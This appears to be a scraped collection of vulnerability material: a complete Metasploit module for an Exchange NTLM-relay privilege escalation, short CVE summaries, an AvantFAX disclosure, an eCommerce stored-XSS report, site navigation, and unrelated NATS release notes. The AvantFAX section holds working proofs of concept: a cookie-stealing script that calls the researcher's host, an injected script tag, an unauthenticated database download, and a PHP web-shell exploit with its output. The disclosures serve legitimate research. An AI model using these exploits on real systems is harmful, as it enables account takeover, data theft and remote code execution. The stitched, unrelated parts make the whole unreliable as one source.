This Metasploit module exploits a privilege escalation vulnerability found in Microsoft Exchange - CVE-2019-0724 Execution of the module will force Exchange to authenticate to an arbitrary URL over HTTP via the Exchange PushSubscription feature. This allows us to relay the NTLM authentication to a Domain Controller and authenticate with the privileges that Exchange is configured. The module is based on the work by @_dirkjan,.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  def initialize    super(      'Name'           => 'Microsoft Exchange Privilege Escalation Exploit',      'Description'    => %q{        This module exploits a privilege escalation vulnerability found in Microsoft Exchange - CVE-2019-0724        Execution of the module will force Exchange to authenticate to an arbitrary URL over HTTP via the Exchange PushSubscription feature.        This allows us to relay the NTLM authentication to a Domain Controller and authenticate with the privileges that Exchange is configured.        The module is based on the work by @_dirkjan,      },      'Author'         => [        '_dirkjan',         # Discovery and PoC        'Petros Koutroumpis' # Metasploit      ],      'References'      =>         [           [ 'CVE', '2019-0724' ],           [ 'URL', 'https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/' ]         ],       'DefaultOptions' =>        {          'SSL' => true,          'RPORT' => 443        },      'License'        => MSF_LICENSE,      'DisclosureDate' => '2019-01-21'    )    register_options(      [        OptString.new('USERNAME', [ true, "Username of any domain user with a mailbox on Exchange"]),        OptString.new('PASSWORD', [ true, "Password or password hash (in LM:NT format) of the user"]),        OptString.new('DOMAIN', [ true, "The Active Directory domain name"]),        OptString.new('TARGETURI', [ true, "Exchange Web Services API endpoint", "/EWS/Exchange.asmx" ]),        OptString.new('EXCHANGE_VERSION', [ true, "Version of Exchange (2013|2016)", "2016" ]),        OptString.new('ATTACKER_URL', [ true, "Attacker URL", nil ])      ])  end  def run    domain = datastore['DOMAIN']    uri = datastore['TARGETURI']    exchange_version = datastore['EXCHANGE_VERSION']    attacker_url = datastore['ATTACKER_URL']    req_data = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>" + "\r\n"    req_data += "<soap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\">" + "\r\n"    req_data += "<soap:Header>" + "\r\n"    req_data += "<t:RequestServerVersion Version=\"Exchange"+exchange_version+"\" />" + "\r\n"    req_data += "</soap:Header>" + "\r\n"    req_data += "<soap:Body>" + "\r\n"    req_data += "<m:Subscribe>" + "\r\n"    req_data += "<m:PushSubscriptionRequest SubscribeToAllFolders=\"true\">" + "\r\n"    req_data += "<t:EventTypes>" + "\r\n"    req_data += "<t:EventType>NewMailEvent</t:EventType>" + "\r\n"    req_data += "<t:EventType>ModifiedEvent</t:EventType>" + "\r\n"    req_data += "<t:EventType>MovedEvent</t:EventType>" + "\r\n"    req_data += "</t:EventTypes>" + "\r\n"    req_data += "<t:StatusFrequency>1</t:StatusFrequency>" + "\r\n"    req_data += "<t:URL>"+attacker_url+"</t:URL>" + "\r\n"    req_data += "</m:PushSubscriptionRequest>" + "\r\n"    req_data += "</m:Subscribe>" + "\r\n"    req_data += "</soap:Body>" + "\r\n"    req_data += "</soap:Envelope>" + "\r\n"    http = nil    http = Rex::Proto::Http::Client.new(      rhost,      rport.to_i,      {},      ssl,      ssl_version,      proxies,      datastore['USERNAME'],      datastore['PASSWORD']    )    http.set_config({ 'preferred_auth' => 'NTLM' })    http.set_config({ 'domain' => domain })    add_socket(http)    req = http.request_raw({      'uri' => uri,      'method' => 'POST',      'ctype' => 'text/xml; charset=utf-8',      'headers' => {            'Accept' => 'text/xml'       },      'data' => req_data    })    begin      res = http.send_recv(req)      xml = res.get_xml_document      http.close    rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT, ::Rex::HostUnreachable      print_error("Connection failed")    rescue OpenSSL::SSL::SSLError, OpenSSL::Cipher::CipherError      print_error "SSL negotiation failed"    end    if res.nil?      fail_with(Failure::Unreachable, 'Connection failed')    end    if res.code == 401      fail_with(Failure::NoAccess, 'Server returned HTTP status 401 - Authentication failed')    end    if xml.nil?      fail_with(Failure::UnexpectedReply, "Empty reply from server")    end    if res.code == 500 && xml.text.include?("ErrorInvalidServerVersion")      fail_with(Failure::BadConfig, "Server does not accept this Exchange dialect. Specify a different Exchange version")    end    unless res.code == 200      fail_with(Failure::UnexpectedReply, "Server returned HTTP #{res.code}: #{xml.text}")    end    print_good("Exchange returned HTTP status 200 - Authentication was successful")    if xml.text.include? "ErrorMissingEmailAddress"      fail_with(Failure::BadConfig, "The user does not have a mailbox associated. Try a different user.")    end    unless xml.text.include? "NoError"      fail_with(Failure::Unknown, "Unknown error. Response: #{xml.text}")    end    print_good("API call was successful")  endend

Microsoft Exchange Privilege Escalation

Raspberry Pi OS through 5.10 has the raspberry default password for the pi account. If not changed, attackers can gain administrator privileges.

CVE-2021-38759: Raspberry Pi Documentation - Configuration

Zoho ManageEngine OpManager Stable build before 125203 (and Released build before 125233) allows Remote Code Execution via the Smart Update Manager (SUM) servlet.

CVE-2020-28653: Read me | OpManager Help

An issue was discovered in Halvotec RAQuest 10.23.10801.0. The login page is vulnerable to wildcard injection, allowing an attacker to enumerate the list of users sharing an identical password. Fixed in Release 10.24.11206.1.

*   Home
*   About Us
    
    *   Meet Success
        
        *   About Us
        *   Career Opportunities
        *   Where to meet us?
        *   Complaint
        
    *   ![](https://excellium-services.com/wp-content/uploads/2019/07/excellium_banner_notre_vision_2.jpg)**About us**
        
        Our expert team knows how to anticipate, collaborate, and innovate.
        
        About feature 2
    *   ![career](https://excellium-services.com/wp-content/uploads/2019/07/excellium_banner_securite_reseau_1.jpg)**Career Opportunities**
        
        Work with leaders in your field to develop insight, experience and truly add value.
        
        About feature 1
    *   **Get in Touch**
        
        5 rue Goell L-5326 Contern Luxembourg.
        
        +352 26 20 39 64  
        Mon-Fri, 6am until 10pm
        
        contact@excellium-services.com  
        
        Contact feature
    
*   Services
    
    *   EyeGuard – SOC
    *   Information Security Governance
    *   Intrusion Tests – Red Team
        
        *   Application Security Team
        
    *   Network & Security Infrastructure
    *   CERT – XLM
    *   EyeTools
        
        *   EyeNotify
        *   EyeDeep
        *   EyeTLD
        
    *   GDPR
    *   Training
    
*   Security advisory
*   Blog
*   Contact Us
*   Emergency

![Excellium Services](https://excellium-services.com/wp-content/uploads/2019/07/logoviolet.png)

Skip to content

*   Home
*   About Us
    
    *   Meet Success
        
        *   About Us
        *   Career Opportunities
        *   Where to meet us?
        *   Complaint
        
    *   ![](https://excellium-services.com/wp-content/uploads/2019/07/excellium_banner_notre_vision_2.jpg)**About us**
        
        Our expert team knows how to anticipate, collaborate, and innovate.
        
        About feature 2
    *   ![career](https://excellium-services.com/wp-content/uploads/2019/07/excellium_banner_securite_reseau_1.jpg)**Career Opportunities**
        
        Work with leaders in your field to develop insight, experience and truly add value.
        
        About feature 1
    *   **Get in Touch**
        
        5 rue Goell L-5326 Contern Luxembourg.
        
        +352 26 20 39 64  
        Mon-Fri, 6am until 10pm
        
        contact@excellium-services.com  
        
        Contact feature
    
*   Services
    
    *   EyeGuard – SOC
    *   Information Security Governance
    *   Intrusion Tests – Red Team
        
        *   Application Security Team
        
    *   Network & Security Infrastructure
    *   CERT – XLM
    *   EyeTools
        
        *   EyeNotify
        *   EyeDeep
        *   EyeTLD
        
    *   GDPR
    *   Training
    
*   Security advisory
*   Blog
*   Contact Us
*   Emergency

Our website uses cookies technologies to assist with navigation and your ability to provide feedback, analyze your use of our products and services, to enable you to use the social media functionalities and assist with our promotional and marketing efforts, and provide content from third parties. You may choose to opt-out from all non-essential cookie or allow them for a better browsing experience. For more information on the use of cookies, Please check our Privacy Notice ACCEPT REJECT

CVE-2019-19614: CERT-XLM: Security advisory - Excellium Services

A File Upload vulnerability exists in AvantFAX 3.3.7. An authenticated user can bypass PHP file type validation in FileUpload.php by uploading a specially crafted PHP file.

**Multiple Vulnerabilities in AvantFAX 3.3.7**

AvantFAX is an open-source PHP web application designed for managing and sending faxes over the Internet. Users can send and receive faxes using a virtual fax machine connected to a server equipped with a fax modem, or fax server.

On November 2022, a researcher from Cycura's offensive security research team discovered three vulnerabilities affecting AvantFAX 3.3.7. Exploitation of these vulnerabilities may lead to administrator account takeover, sensitive information disclosure, and remote code execution.

1.  CVE-2023-23326: Session Hijacking via Authenticated Stored Cross-Site Scripting
2.  CVE-2023-23327: Unauthenticated Access to AvantFAX Backup Fax Archive and Database
3.  CVE-2023-23328: Remote Code Execution via PHP Arbitrary File Upload

Earlier releases of AvantFAX may also be affected by these vulnerabilities.

**Credit**

The vulnerabilities were discovered by Cycura cyber security researcher Harold Rodriguez.

**Acknowledgement**

Cycura would like to thank the AvantFAX team for their prompt acknowledgement of our report and willingness to work collaboratively to remediate the vulnerabilities. It is encouraging to see a company that takes cybersecurity seriously, and is committed to continuously improving their security practices.

**Disclosure Timeline**

*   November 11, 2022:
    *   Discovered three vulnerabilities affecting AvantFAX 3.3.7.
*   November 22, 2022:
    *   Notified AvantFAX of the vulnerabilities and intent to publish our findings in accordance with our 90-day disclosure timeline policy.
    *   AvantFAX acknowledged vulnerability report.
*   January 10, 2023:
    *   AvantFAX provided us with an updated release that addresses the vulnerabilities.
    *   Requested CVEs from MITRE for the three vulnerabilities.
*   January 11, 2023:
    *   Verified that the updated release remediates the vulnerabilities.
*   February 13, 2023:
    *   Received CVE IDs for the three vulnerabilities.
    *   Notified AvantFAX that the updates remediated the vulnerabilities and our intent to proceed with public disclosure after February 21, 2023.
*   February 21, 2023:
    *   AvantFAX releases version 3.4.0 which remediates the vulnerabilities.

**Remediation**

The AvantFAX team has remediated these issues in AvantFAX 3.4.0. It is strongly recommended that users upgrade to the latest release available at http://www.avantfax.com/.

**CVE-2023-23326: Session Hijacking via Authenticated Stored Cross-Site Scripting****Vulnerability Description**

AvantFAX is vulnerable to Stored Cross-Site Scripting (XSS) in the user's email address field. An authenticated low privilege user account can exploit this vulnerability to steal an administrator's session cookie and hijack their session. When an administrator logs in to the /admin page, the XSS payload is executed immediately upon loading the admin dashboard.

**Proof of Concept**

Host the following Javascript file x.js on a server we control; for example, 192.168.225.132.

    var x = new Image; 
    x.src = 'http://192.168.225.132/cookie=' + document.cookie; 
    

Authenticate to AvantFAX as a low privilege user, and set the user's email address to the following:

    <script src="http://192.168.225.132/x.js"></script>
    

Save the changes, and log out.

Login as an administrator user. The dashboard will immediately load and execute the contents of x.js, which sends the administrator's session cookie to our server.

This can be verified by looking at the contents of our HTTP server logs and observing the administrator's session cookie:

    192.168.225.1 - - [16/Nov/2022:15:47:28 -0500] "GET /x.js HTTP/1.1" 200 79 "http://192.168.225.131/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0" 
    192.168.225.1 - - [16/Nov/2022:15:47:28 -0500] "GET /cookie=AvantFAX=p4vvvp0tnesmao009u0l6lo422 HTTP/1.1" 404 125 "http://192.168.225.131/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0" 
    

**CVE-2023-23327: Unauthenticated Access to AvantFAX Backup Fax Archive and Database****Vulnerability Description**

Administrators can create and download a backup of the sent and received faxes, as well as the contents of the avantfax database. These files are stored in /avantfax/tmp with predictable names:

    avantfax-archive-YYYYMMDD.tar.gz 
    avantfax-schema-YYYYMMDD.tar.gz 
    

The code responsible for creating the file names can be found in admin/system\_func.php:

    } elseif ($formdata->download_ar) { 
    		// download fax archive 
    		$basname        = "avantfax-archive-".date ("Ymd").".tar.gz"; 
    		$tmpfile        = $TMPDIR.$basname; 
    		system ("tar -czf $tmpfile $ARCHIVE $ARCHIVE_SENT"); 
    		header ("Location: ../tmp/$basname"); 
    		exit; 
    } elseif ($formdata->download_db) { 
    		// download fax database dump 
    		$basname        = "avantfax-schema-".date ("Ymd").".sql.gz"; 
    		$tmpfile        = $TMPDIR.$basname; 
    		system ("mysqldump --user=".AFDB_USER." --password=".AFDB_PASS." ".AFDB_NAME." | gzip -9 > $tmpfile"); 
    		header ("Location: ../tmp/$basname"); 
    		exit; 
    } 
    

Due to its predictable naming convention, it is trivial for a user to brute force a range of dates and download these files. The archive files contain faxes that have been sent and received, and the schema files contain user accounts and their MD5 hashed passwords.

**Proof of Concept**

Login as an administrator, go to the Systems Functions page and click on the Download Archive and Download Database buttons. These will create the avantfax-archive and avantfax-schema files appended with the current date in YYYYMMDD format.

Download the files as an unauthenticated user:

    $ curl -s http://192.168.225.131/tmp/avantfax-schema-20221116.sql.gz | gunzip | grep 'INSERT INTO `UserAccount`' 
    
    INSERT INTO `UserAccount` VALUES (1,'AvantFAX Admin','admin','d1a714af4e450a88cb6eba85fdd93344','root@localhost','','','','','','',0,0,0,1,0,'2022-11-15 18:00:26','2022-11-16 18:57:07','192.168.225.1','en','','','','0000-00-00',0,0,1,0,1,0,1),(2,'Koji','koji','d1a714af4e450a88cb6eba85fdd93344','koji@test.local','','','','','','',2,25,30,0,0,'2022-11-16 16:04:40','2022-11-16 18:00:14','192.168.225.1','en','','','','0000-00-00',0,0,0,0,1,0,0); 
    

**CVE-2023-23328: Remote Code Execution via PHP Arbitrary File Upload****Vulnerability Description**

AvantFAX does not properly validate uploaded files, which allows an authenticated user to upload PHP files with arbitrary code resulting in remote code execution.

The Send Fax page allows a user to upload documents to be faxed. File types are restricted to Postscript (.ps), PDF (.pdf), TIFF (.tiff), and text (.txt). Attempting to upload a PHP file called test.php with the following contents results in the application rejecting it:

The user is presented with an error "File type is unauthorized (text/x-php)".

File type verification is performed using PHP’s mime\_content\_type() function which checks the contents of the file to determine its type. This check is done within the load\_file() function in includes/FileUpload.php:

    // check mimetype  
    if (function_exists('mime_content_type')) {  
    		$this->mimetype = mime_content_type($this->tmpname);  
    } elseif (extension_loaded('fileinfo')) {  
    		$minfo = new finfo(FILEINFO_MIME);  
    		$this->mimetype = $minfo->file($this->tmpname);  
    } else {  
    		$this->mimetype = $file['type'];  
    } 
    

When mime\_content\_type() checks test.php, it returns text/x-php. Since this is not in the allowed list of file types, the application returns a "File type is unauthorized" error.

However, if the contents were changed to include arbitrary text right before the <?php tag, the application accepts it:

    This line bypasses the file-type check. 
    <?php 
    print("Test"); 
    ?> 
    

This is because mime\_content\_type() returns text/plain which is an allowed file type.

Furthermore, the application does not check for file extensions, and accepts files that have a .php extension. This allows a user to upload PHP files containing arbitrary code that is executed when loaded.

The uploaded file is saved in /avantfax/tmp with 9 hexadecimal characters prepended to the file name. For example, our uploaded test.php file could be saved as ac0f129d8test.php.

The 9-character hexadecimal string is generated by the set\_randname() function in includes/FileUpload.php. However, this isn't actually random and is instead generated by taking the current time stamp, hashing it using MD5, and then taking the first 9 characters of that MD5 hash:

    $this->filename = substr(md5(microtime()), 0, $n).$this->filename; 
    

This allows us to predict possible 9-character hexadecimal strings if we know the time on the server, and then perform a brute force attack to try and find the name of the uploaded file. There are no access controls to protect the /avantfax/tmp directory, which allows unauthenticated users to load the PHP file and execute its contents once they have discovered its file name.

**Proof of Concept**

We developed a PHP script to automate the exploitation process. It uploads a web shell to the server and records a time stamp of when the upload is completed. An arbitrary number is subtracted from the time stamp to establish a time period in the hope that one of those time stamps in that range will match the time stamp set\_randname() used to generate the file name.

In our test environment, subtracting 15,000 milliseconds from the time stamp provided a large enough range to cover the time stamp used by set\_randname().

Each time stamp is hashed using MD5, and the first 9 characters of the hash are prepended to the file name of our web shell. A request is made to the server for the updated file name, and if the web server returns a 200 HTTP response code, then we have found the web shell.

In this particular instance, it took approximately 40 seconds for the script to find the web shell on the server:

    $ time php -e af_pwn.php 
    [+] Target: 192.168.225.131 
    [+] Payload: 
    
    This line bypasses the file-type check. 
    <?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?> 
    
    [+] Uploading payload... 
    [+] Upload completed at: 0.28506400 1668789238 
    [+] Searching for webshell... 
    [+] Using time period 285064 to 270064 
    [+] Found webshell at http://192.168.225.131/tmp/e7ba68bcbtest.php 
    [+] Exploit using http://192.168.225.131/tmp/e7ba68bcbtest.php?cmd=id 
    
    real    40.85s 
    user    0.52s 
    sys     1.66s 
    cpu     5% 
    

We are now able to execute commands on the server via the web shell and retrieve the output:

    $ curl http://192.168.225.131/tmp/e7ba68bcbtest.php?cmd=id 
    This line bypasses the file-type check. 
    uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0 
      
    $ curl http://192.168.225.131/tmp/e7ba68bcbtest.php?cmd=uname+-a 
    This line bypasses the file-type check. 
    Linux localhost.localdomain 3.10.0-1160.el7.x86_64 #1 SMP Mon Oct 19 16:18:59 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

CVE-2023-23328: vulnerabilities/README.md at master · superkojiman/vulnerabilities

Active eCommerce CMS version 6.5.0 suffers from a persistent cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://activeitzone.com/active-ecommerce-cms/                             ││  Vendor   : Active It Zone                                                             ││  Software : Active eCommerce CMS 6.5.0                                                 ││  Vuln Type: Stored XSS                                                                 ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  Allow Attacker to inject malicious code into website, give ability to steal sensitive ││  information, manipulate data, and launch additional attacks.                          ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘   Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘## Stored XSS------------------------------------------------------------POST /ecommerce/support_ticket HTTP/2Content-Disposition: form-data; name="details"<script>alert(1)</script>------------------------------------------------------------POST parameter 'details' is vulnerable to XSS## Steps to Reproduce:1. Login (as User) "Normal User"2. Go to [Support Ticket] on this Path (https://website/support_ticket)3. Click [Create a Ticket]4. Inject your [XSS Payload] in "Provide a detailed description"5. Send Ticket6. When ADMIN Visit [Support Desk] .. [Ticket] to Check [New Tickets] in Administration Panel on this Path (https://website/admin/support_ticket)7. The  ADMIN will click on the [Eye Icon] to View Details and Read The Ticket8. XSS will Fire & Executed on his Browser[-] Done

Active eCommerce CMS 6.5.0 Cross Site Scripting

NATS nats-server 2.2.0 through 2.7.4 allows directory traversal because of an unintended path to a management action from a management account.

**Release v2.9.22**

**Changelog****Go Version**

*   1.20.8 (updated out-of-cycle since Go 1.19 is now EOL)

**Dependencies**

*   github.com/nats-io/jwt/v2 v2.5.0
*   golang.org/x/crypto v0.12.0
*   golang.org/x/sys v0.11.0

**Improved**

Monitoring

*   CORS Allow-Origin passthrough for monitoring server (#4423) Thanks to @mdawar for the contribution!

JetStream

*   Improve consumer scaling reliability with filters and cluster restart (#4404)
*   Send event on lame duck mode (LDM) to avoid placing assets on shutting down nodes (#4405)
*   Skip filestore tombstones if downgrade from 2.10 occurs (#4452)
*   Adjust delivered and waiting count when consumer message delivery fails (#4472)

**Fixed**

Config

*   Allow empty configs and fix JSON compatibility (#4394, #4418)
*   Remove TLS OCSP debug log on reload (#4453)

Monitoring

*   Fix Content-Type header when /healthz is not 200 OK (#4437) Thanks to @mdawar for the contribution!
*   Fix server /connz idle time sorting (#4463) Thanks to @mdawar for the contribution!
*   Interface conversion bug which could cause a panic when calling /ipqueuesz endpoint (#4477)

Leafnode

*   Fix race condition which could affect propagating interest over leafnode connections (#4464)

JetStream

*   Fix possible deadlock in checking for drift in the usage reporting when storing a message (#4411)
*   Durable pull consumers could get cleaned up incorrectly on leader change (#4412)
*   Moving an R1 stream could sometimes lose all messages (#4413)
*   Prevent peer-remove of an R1 stream which could result in the stream becoming orphaned (#4420)
*   Ensure consumer ack pending is less than max ack pending on state restore (#4427)
*   Ensure to reset election timer when catching up (#4428) Thanks to @yuzhou-nj for the report!
*   Auto step-down Raft leader if an entry is missing on a catchup request (#4432)
*   Fix PurgeEx with keep having deletes in blocks (#4431)
*   Update global subject index when message blocks expire (#4439)
*   Ensure max messages per subject is respected after update (#4446) Thanks to @anthonyjacques20 for the report!
*   Ignore and remove empty message blocks on rebuild (#4447)
*   Fix possible accounting discrepancy on message write (#4455)
*   Fix potential message duplication from stream sources when downgrading from 2.10 (#4454)
*   Check for checksum violations for all records before sequence processing (#4465)
*   Fix message block accounting (#4473)

**Complete Changes**

v2.9.21...v2.9.22

**Release v2.9.21**

**Changelog****Go Version**

*   1.19.12

**Dependencies**

*   github.com/klauspost/compress v1.16.7
*   github.com/nats-io/nats.go v1.28.0
*   go.uber.org/automaxprocs v1.5.3
*   golang.org/x/crypto v0.11.0
*   golang.org/x/sys v0.10.0

**Added**

OCSP

*   Add fetch, cache, and verification of client CA's OCSP Response for NATS, WebSocket, and MQTT client mTLS connections (#4362, backported from 2.10)
*   Add bi-directional fetch, cache, and verification of CA OCSP Response for LEAF connections (#4362, backported from 2.10)

See ADR-38 OCSP Peer Verification

General

*   Add UTC log timestamp option (#4331, backported from 2.10)

**Improved**

JetStream

*   Don't error to server logs if message was deleted for consumer (#4328)
*   Improve publish performance for zero-interest subjects (#4359) Thanks to @antlad for reporting the issue!
*   Sync and reset message rejected count to ensure replicas don’t incorrectly discard messages (#4365, #4366)

**Fixed**

General

*   Leaking memory on usage of getHash() (#4329) Thanks to @VuongUranus for reporting the issue!
*   Server reload with highly active accounts and service imports could cause panic or dataloss (#4327)
*   Fix detection of an unusable configuration file (#4358)
    *   **NOTE: as a side effect of this fix, the server will no longer startup with an empty config file**
*   Fix a few system service imports going missing after configuration reload (#4360)

OCSP

*   Fix local-determination of issuer CA at startup (#4362)
*   Remove constraint that all (super)cluster node peers must be issued by the same CA (#4362)

Embedded

*   Don't require TLS for in-process client connection (#4323)

JetStream

*   Fix serializability guarantee for concurrent publish when using expected-last-subject-sequence (#4319)
*   Report correct consumer count in paged list response (#4339)
*   Fix not validating single token filtered consumer (#4338)
*   Fix stream recovery of message block with sequence gaps (#4344)
*   Fix panic when re-calculating first sequence of SimpleState info (#4346)
*   Fix stream store accounting drift (#4357)

**Complete Changes**

v2.9.20...v2.9.21

**Release v2.9.20**

**Changelog****Go Version**

*   1.19.11

**Added**

Windows

*   Backport 2.10 support for native Windows certificate store (#4268)

**Improved**

Accounts

*   Allow advisories to be exported/imported across accounts (#4302)

JetStream

*   Optimize consumer create time on streams with a large number of blocks (#4269)

**Fixed**

Gateways

*   Protect possible data race when reloading accounts (#4274)

Leafnodes

*   Prevent zombie subscriptions which could lead to silent data loss when using queue subscriptions (#4299)

WebSocket

*   Prevent reporting tls_required when tls_available is not set (#4264)

JetStream

*   Prevent corrupting streams actively being restored during health check (#4277) Thank you @vitush93 for the report!
*   Prevent encrypted data attempting to be decrypted with an empty key (#4301)

MQTT

*   Ensure republished messages from streams are received by MQTT subscriptions (#4303)

**Complete Changes**

v2.9.19...v2.9.20

**Release v2.9.19**

**Changelog****Go Version**

*   1.19.10

**Improved**

JetStream

*   Improve resource utilization when creating mirrors on very high-sequence streams (#4249)

**Fixed**

WebSocket

*   Ensure INFO properties are populated based on the WebSocket listener when enabled (#4255) Thanks to @Envek for reporting the issue!

**Complete Changes**

v2.9.18...v2.9.19

**Release v2.9.18**

**Changelog****Go Version**

*   1.19.10

**Dependency Updates**

*   golang.org/x/crypto v0.9.0 (#4236)
*   golang.org/x/sys v0.8.0 (#4236)
*   github.com/nats-io/nats.go v1.27.0 (#4239)

**Improved**

Monitoring

*   Optimize /statsz locking and sending in standalone mode (#4235)

JetStream

*   Apply ack floor check only for interest-based streams (#4206)
*   Improved efficiency and reduced CPU usage of the consumer ack floor check, particularly when the stream first sequence is a large number (#4226)
*   Improve clean-up phase of R1 consumers on server restart for name reuse (#4216)
*   Optimize “last message lookups” by subject (KV get operations) for small messages (#4232) Thanks to @jjthiessen for reporting the issue!
*   Only enable JetStream account updates in clustered mode (#4233) Thanks to @tpihl for reporting the issue!

**Fixed**

General

*   Fix a variety of potential panic scenarios (#4214) Thanks to @Zamony and @artemseleznev for the contribution!

Leadnode

*   Daisy chained leafnodes could have unreliable interest propagation (#4207)
*   Properly distribute requests to queue groups across leafnodes (#4231)

JetStream

*   Killed server on restart could render encrypted stream unrecoverable (#4210) Thanks to @BhatheyBalaji for the report!
*   Fix a few data races detected internal testing (#4211)
*   Process extended purge operations correctly when being replayed (#4212, #4213) Thanks to @MauriceVanVeen for the report and contribution!

**Complete Changes**

v2.9.17...v2.9.18

**Release v2.9.17**

**Changelog****Go Version**

*   1.19.9

**Dependency Updates**

*   github.com/klauspost/compress v1.16.5 (#4088)

**Improved**

Core

*   Additional optimizations to outbound queues, reducing memory footprint (#4084, #4093, #4139)
*   Use faster flate compression library for WebSocket transport compression (#4087)

Leafnodes

*   Optimize subscription interest propagation for large leafnode fleet (#4117, #4135)

Monitoring

*   Support sorting by RTT for /connz (#4157)

Resolver

*   Improve signaling for missing account lookups (#4151)

JetStream

*   Optimized determining if a stream snapshot is required (#4074)
*   Run periodic check for consumer “ack floor” drift on leader (#4086)
*   Optimize leadership transfer during a stream migration (#4104)
*   Improve how clustered consumer state is hydrated on startup (#4107)
*   Add operation type to panic messages for improved debugging (#4108)
*   Improve health check to repair stalled assets periodically (#4116, #4172)
*   Remove unnecessary filestore lock to improve I/O performance (#4123)
*   Various Raft leadership improvements (#4126, #4142, #4143, #4145)
*   Improve accuracy of account usage (#4131)
*   Clean up old Raft groups when streams are reset (#4177)

**Fixed**

General

*   Fix various names in comments (#4099) Thanks to @cuishuang for the contribution!
*   Fix various typos in comments (#4169) Thanks to @savion1024 for the contribution!
*   Update tests to reflect the server.Start() call no longer blocks (#4111) Thanks to @lheiskan for reporting the issue!
*   Fix race condition in config reload with gateway sublist check (#4127)
*   Track all remote servers in a NATS system with different domains (#4159)

Core

*   Fix premature closing in WebSocket transport due to outbound queue changes (#4084)
*   Fix subscription interest for config-based accounts during config reload (#4130)
*   Use monotonic time for measuring durations internally (#4132, #4154, #4163)

Monitoring

*   Service import reporting for /accountz when mapping to local subjects (#4158)

JetStream

*   Fix formatting of Raft debug log (#4090)
*   Prevent failure of /healthz in single server mode on failed snapshot restore (#4100)
*   Ensure a stream Raft node has fully stopped and resources freed (#4118)
*   Fix case where R1 streams are orphaned and can’t scale up (#4146)
*   Protect against out of bounds access on usage updates (#4164)
*   Fix state rebuild where the first block is truncated and missing index info (#4166)
*   Avoid stale KV reads on server restarted for replicated stores (#4171) Thanks to @yixinin for reporting the issue!
*   Prevent deadlock with usage report for accounts (#4176)

**Complete Changes**

v2.9.16...v2.9.17

**Release v2.9.16**

**Changelog****Go Version**

*   1.19.8

**Dependency Updates**

*   github.com/klauspost/compress v1.16.4
*   github.com/nats-io/jwt/v2 v2.4.1
*   github.com/nats-io/nkeys v0.4.4
*   golang.org/x/crypto v0.8.0
*   golang.org/x/sys v0.7.0

**Added**

Build

*   Nightly build of the “main” branch as a Docker image: synadia/nats-server:nightly-main (#3961, #3962, #3963, #3972, #4019, #4063)
*   Version control SHA in the Goreleaser build of the server (#3993). Thanks for the report @jzhoucliqr!  
    Monitoring
*   Add server name and route remote server name to /routez (#4054)

Resolver

*   Add “hard\_delete” option for stored JWTs (#3783). Thanks for the contribution @JulienVdG!

**Improved**

JetStream

*   Storage and Raft layer improvements to decrease p99 latency variance and memory pressure in high load environments (#3956, #3952, #3965, #3981, #3999, #4018, #4020, #4021, #4022, #4026, #4027, #4028, #4029, #4030, #4038, #4045, #4050, #4053)
*   Don’t show Raft warning for node that is closed (#3968)
*   Use pooled buffer for flushing encrypted message blocks (#3975)
*   Remove snapshotting of cores and maxprocs (#3979)
*   Improvements to interest-based streams to optimize when messages are deleted (#4006, #4007, #4012)
*   Better handling of concurrent stream and consumer creation of the same name (#4013)
*   Finer-grain locking during asset checking to reduce contention in the /healthz endpoint (#4031)
*   Encrypted file stores will now limit block sizes to improve performance (#4046)
*   Improve performance on storing messages with varying subjects and limits are imposed (#4048, #4057). Thanks for the report @kung-foo!

**Fixed**

Subjects

*   Ensure subjects containing percent (%) are escaped (#4040)

Accounts

*   Fix data race when setting up service import subscriptions (#4068)

Leaf

*   Fix leaf client connection failing on OCSP setups (#3964)
*   Fix case when allow/deny permissions on leaf connection could block legitimate interest (#4032)

Cluster

*   Route disconnect not detected by ping/pong (#4016). Thanks for the contribution @sandykellagher!

JetStream

*   Pull consumer not sending timeout error to clients for expired requests (#3942)
*   Prevent meta leader deadlock during deletion of orphaned streams during server startup (#3945)
*   Clear ack’ed messages when scaling workqueue or interest-based streams (#3960) Thanks for the report @Kaarel!
*   Remove messages from interest-based stream on consumer snapshot (#3970)
*   Fix potential panic in message block buffer pool (#3978)
*   Fixed an issue with consumer states growing and causing instability (#3980)
*   Improve handling of out-of-storage condition (#3985)
*   Address memory leak of unreachable Raft groups when JetStream becomes disabled (#3986)
*   Prevent Raft leader from being placed on server in lame-duck mode (#4002)
*   Remove potential race condition on sysRequest (#4017)
